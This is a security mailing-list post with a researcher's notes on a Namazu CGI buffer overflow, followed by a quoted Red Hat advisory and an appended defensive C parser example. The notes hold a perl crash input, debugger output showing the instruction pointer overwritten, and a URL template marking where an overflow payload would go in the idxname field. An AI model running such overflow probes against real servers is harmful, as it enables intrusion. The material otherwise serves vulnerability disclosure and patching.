Details on the updated namazu packages that are available

Doh! Looks like I slept on this one too long... here's some of my
personal notes on exploiting this issue. Have fun.
-KF

[root@linuxppc root]# cat misc/namzu-overflow.txt

http://www.altavista.com/sites/search/web?q=url%3Anamazu.cgi&kl=XX

This is what caught my attention:
[msg(XXX)] like 12 days old
[msg(XXX)] 2001-12-12  NOKUBI Takatsugu  <knok@daionet.gr.jp>
[msg(XXX)] (nmz_choose_msgfile_suffix): Fixed buffer overflow.
[msg(XXX)] 
http://cvs.namazu.org/~checkout~/namazu/ChangeLog?rev=1.912&content-type=text/plain

2001-12-11 NOKUBI Takatsugu <knok@daionet.gr.jp>

* nmz/field.c: Fixed possibility of buffer overflow.

2001-12-04 NOKUBI Takatsugu <knok@daionet.gr.jp>

* src/{form.c,rcfile.c,result.c}: Fixed possibility of buffer overflow.

* src/cgi.c (validate_idxname): Fixed another cross-site scripting
vulnerability.
(cgi_get_vars): Fixed possibility of buffer overflow.

2001-07-03 Yoshinori TAKESAKO <takesako@namazu.org>

* src/result.c (my_strcasestr): Checked a buffer overflow,
the case where a character sequence was over at the 1st byte
of EUC-JP.

Here is my research on the above issues:
There are several buffer overflows in the QUERY_STRING options.
Unfortunately the check in namazu.h screws us...

[root@linuxppc src]# grep CGI_QUERY_MAX *.h
namazu.h:    CGI_QUERY_MAX       = 512, /* Max length of a CGI query */

cgi.c:        if (contlen > CGI_QUERY_MAX) {
cgi.c:            printf(_("Too long QUERY_STRING"));

In other words, unless you have modified namazu, you are not vuln.
Now we can exploit this via the command line as a side note ... although
it's not suid...
[root@linuxppc src]# ./namazu querystring `perl -e 'print "A" x 1024'`
Results:

References:  [  (can't open the index)  ]

No document matching your query.
Aborted (core dumped)

The eip is easily overwritten. Here only the first 2 bytes...
Starting program: /root/namazu-2.0.5/src/../src/.libs/lt-namazu yamom
`perl -e 'print "A" x 1342'`

Program received signal SIGILL, Illegal instruction.
0x41412f4c in ?? ()
So just for theory's sake and cuz I want to
code something...

we will say that we are using a custom namazu in which we modified the
following values in namazu.h.

   CGI_QUERY_MAX       = 512, /* Max length of a CGI query */
   CGI_INDEX_NAME_MAX  = 64,  /* Max length of an index name in a CGI query */

Then we could be exploited.

cgi-bin/namazu.cgi?query=overflow&whence=0=en&idxname=<bof here> would 
be a quick example.

-KF

bugzilla@redhat.com wrote:

> ---------------------------------------------------------------------
>                    Red Hat, Inc. Red Hat Security Advisory
> 
> Synopsis:          Updated namazu packages are available
> Advisory ID:       RHSA-2001:179-05
> Issue date:        2001-12-27
> Updated on:        2002-01-09
> Product:           Red Hat Linux
> Keywords:          namazu cross-site scripting buffer overflow
> Cross references:  
> Obsoletes:         RHSA-2001:162
> ---------------------------------------------------------------------
> 
> 1. Topic:
> 
> Updated namazu packages are available for Red Hat Linux 7.0J. These
> packages fix cross-site scripting vulnerabilities. They also fix a possible
> buffer overflow.
> 
> 2. Relevant releases/architectures:
> 
> Red Hat Linux 7.0J - i386
> 
> 3. Problem description:
> 
> Namazu is a full-text search engine. Namazu 2.0.9 and earlier may
> inadvertently include malicious HTML tags or scripts in a dynamically
> generated page, based on unvalidated input from untrustworthy sources.
> Also, a buffer overflow vulnerability exists in the buffer size of an
> environment variable.
> 
> These packages update Namazu to version 2.0.10 which is not vulnerable to
> these issues.
> 
> 4. Solution:
> 
> Before applying this update, make sure all previously released errata
> relevant to your system have been applied.
> 
> To update all RPMs for your particular architecture, run:
> 
> rpm -Fvh [filenames]
> 
> where [filenames] is a list of the RPMs you wish to upgrade.  Only those
> RPMs which are currently installed will be updated.  Those RPMs which are
> not installed but included in the list will not be updated.  Note that you
> can also use wildcards (*.rpm) if your current directory *only* contains the
> desired RPMs.
> 
> Please note that this update is also available via Red Hat Network.  Many
> people find this an easier way to apply updates.  To use Red Hat Network,
> launch the Red Hat Update Agent with the following command:
> 
> up2date
> 
> This will start an interactive process that will result in the appropriate
> RPMs being upgraded on your system.
> 
> 5. Bug IDs fixed (http://bugzilla.redhat.com/bugzilla for more info):
> 
> 
> 
> 6. RPMs required:
> 
> Red Hat Linux 7.0J:
> 
> SRPMS:
> ftp://updates.redhat.com/7.0/ja/os/SRPMS/namazu-2.0.10-0j1.src.rpm
> 
> i386:
> ftp://updates.redhat.com/7.0/ja/os/i386/namazu-2.0.10-0j1.i386.rpm
> ftp://updates.redhat.com/7.0/ja/os/i386/namazu-devel-2.0.10-0j1.i386.rpm
> ftp://updates.redhat.com/7.0/ja/os/i386/namazu-cgi-2.0.10-0j1.i386.rpm
> 
> 
> 
> 7. Verification:
> 
> MD5 sum                          Package Name
> --------------------------------------------------------------------------
> 521c9faef31dcd865d3e0090cd023d70 7.0/ja/os/SRPMS/namazu-2.0.10-0j1.src.rpm
> ae5d586caf2098a0b9aefcc7af6522a9 7.0/ja/os/i386/namazu-2.0.10-0j1.i386.rpm
> 904dc3993c140794373471e8a1c64c61 7.0/ja/os/i386/namazu-cgi-2.0.10-0j1.i386.rpm
> af30f16968c527ac9e7669c812618cde 7.0/ja/os/i386/namazu-devel-2.0.10-0j1.i386.rpm
>  
> 
> These packages are GPG signed by Red Hat, Inc. for security.  Our key
> is available at:
>     http://www.redhat.com/about/contact/pgpkey.html
> 
> You can verify each package with the following command:
>     rpm --checksig  <filename>
> 
> If you only wish to verify that each package has not been corrupted or
> tampered with, examine only the md5sum with the following command:
>     rpm --checksig --nogpg <filename>
> 
> 8. References:
> 
> http://www.namazu.org/#news
> 
> 
> Copyright(c) 2000, 2001, 2002 Red Hat, Inc.
> 
> 
> 
> 
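As an added example tied to KF's notes above (it is neither namazu's own code nor KF's): a C parser for the CGI QUERY_STRING that enforces a per-field bound modelled on CGI_INDEX_NAME_MAX alongside the total-length check quoted from cgi.c, so raising CGI_QUERY_MAX can no longer let an over-long idxname reach a 64-byte buffer. The two limits are taken from the post; the function names and the probe helper are assumptions.

```c
/* Added example, not namazu's own code: a QUERY_STRING parser that bounds
 * each field (IDXNAME_MAX, after CGI_INDEX_NAME_MAX) as well as the whole
 * string (QUERY_MAX, after CGI_QUERY_MAX), rejecting instead of truncating.
 * Limits mirror the post; the parser is an illustration, not cgi_get_vars(). */
#include <stdio.h>
#include <string.h>

enum { QUERY_MAX = 512, IDXNAME_MAX = 64 };

/* Extract idxname= from qs into idxname (IDXNAME_MAX + 1 bytes).
 * Returns 0 on success, -1 if the string or the field is too long. */
int parse_idxname(const char *qs, char idxname[IDXNAME_MAX + 1])
{
    idxname[0] = '\0';
    if (strlen(qs) > QUERY_MAX)          /* the cgi.c-style total check */
        return -1;
    for (const char *p = qs; *p; ) {
        const char *end = strchr(p, '&');
        size_t pairlen = end ? (size_t)(end - p) : strlen(p);
        if (pairlen >= 8 && memcmp(p, "idxname=", 8) == 0) {
            size_t vlen = pairlen - 8;
            if (vlen > IDXNAME_MAX)      /* per-field bound: 65 bytes fail here */
                return -1;               /* even though 65 is far below QUERY_MAX */
            memcpy(idxname, p + 8, vlen);
            idxname[vlen] = '\0';
        }
        p = end ? end + 1 : p + pairlen;
    }
    return 0;
}

/* Probe helper (constructed input): is "query=x&idxname=AAAA..." with n A's
 * accepted? Returns 1 if accepted, 0 if rejected. */
int idxname_of_length_accepted(size_t n)
{
    char qs[1024], name[IDXNAME_MAX + 1];
    if (n + 32 >= sizeof qs)
        return 0;
    int off = snprintf(qs, sizeof qs, "query=x&idxname=");
    memset(qs + off, 'A', n);
    qs[off + n] = '\0';
    return parse_idxname(qs, name) == 0;
}
```

Running the probe at 64 and 65 bytes shows the field bound tripping while the total length is still well under 512, which is the gap the post's modified-limits scenario relies on.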